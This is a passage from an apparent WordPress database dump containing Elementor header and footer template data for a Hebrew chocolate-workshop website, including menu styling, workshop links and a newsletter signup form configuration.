Type\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75ff2908\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\",\"stretch_section\":\"section-stretched\"},\"elements\":[{\"id\":\"629a0eb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"795b34de\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false}]'),(1121,229,'_elementor_version','0.4'),(1122,229,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(1125,231,'_elementor_template_type','footer'),(1126,231,'_elementor_edit_mode','builder'),(1127,231,'_edit_lock','1596644407:1'),(1129,231,'_wp_page_template','default'),(1130,231,'_elementor_data','[{\"id\":\"4a55fbba\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"4c2a586d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2838f23b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2e4e8641\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.982,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2bae734c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b29d96\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"4a7f6aed\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.018,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5118f384\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66fbeda3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"668f1337\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"56e06b83\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#2d2d2d\"},\"elements\":[{\"id\":\"7bbb4fd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"7af00eb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05dc \\u05d4\\u05d6\\u05db\\u05d5\\u05d9\\u05d5\\u05ea \\u05e9\\u05de\\u05d5\\u05e8\\u05d5\\u05ea 2020 (c) - \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U \\/ <span style=\\\"text-decoration: underline; color: #ffffff;\\\"><strong><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"https:\\/\\/www.shmul.co.il\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">\\u05e7\\u05d9\\u05d3\\u05d5\\u05dd \\u05d0\\u05ea\\u05e8\\u05d9\\u05dd<\\/a><\\/strong><\\/span> \\u05e2\\\"\\u05d9 \\u05e9\\u05de\\u05d5\\u05dc<\\/p>\",\"text_color\":\"#ffffff\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1131,231,'_elementor_version','2.9.8'),(1132,231,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(1133,232,'_elementor_template_type','footer'),(1134,232,'_elementor_edit_mode','builder'),(1135,232,'_wp_page_template','default'),(1136,232,'_elementor_data','[{\"id\":\"4a55fbba\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"4c2a586d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2838f23b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e4e8641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2bae734c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b29d96\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"3003b83\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1d764f83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"51a1031b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"98f4544\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"4a7f6aed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5118f384\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66fbeda3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"668f1337\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is 